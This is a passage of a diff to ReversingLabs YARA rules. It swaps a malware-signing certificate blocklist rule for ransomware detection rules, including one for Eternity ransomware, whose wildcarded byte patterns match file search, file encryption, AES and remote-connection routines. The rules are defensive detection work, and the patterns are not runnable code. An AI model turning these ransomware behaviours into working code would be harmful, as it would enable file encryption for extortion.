+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ??
+            ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13
+            45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45
+            ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D
+            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ??
+            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ??
+            89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51
+            8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77
+            ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72
+            ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A
+            ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89
+            55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ??
+            52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D
+        }
+		$encrypt_files_p2 = {
+            77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
+            83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F
+            86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ??
+            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ??
+            8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15
+            ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F
+            85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
+            0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ??
+            83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9
+        }
+		$encrypt_files_p3 = {
+            6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D
+            ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
+            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ??
+            68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68
+        }
+		$encrypt_files_p4 = {
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ??
+            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A
+            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
+            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ??
+            51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
+            ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ??
+            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
+        }
+		$encrypt_files_p5 = {
+            E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55
+            ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ??
+            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
+            75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B
+        }
+		$encrypt_files_p6 = {
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ??
+            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D
+            ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ??
+            ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45
+            ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ??
+            ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
+            ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ??
+            89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8
+            ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ??
+            89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ??
+            ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ??
+            ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ??
+            ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ??
+            ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8
+        }
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
+        }
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Eternity ransomware."
 		author = "ReversingLabs"
-		id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc"
+		date = "2022-07-22"
+		modified = "2022-07-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5194-L5212"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Eternity"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08
+            6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F
+            ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13
+            ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
+            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ??
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58
+            13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02
+            28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ??
+            ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ??
+            08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F
+            ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A
+        }
+		$aes_encrypt = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
+            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
+            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
+            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
+        }
+		$encrypt_pass = {
+            72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C
+            08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ??
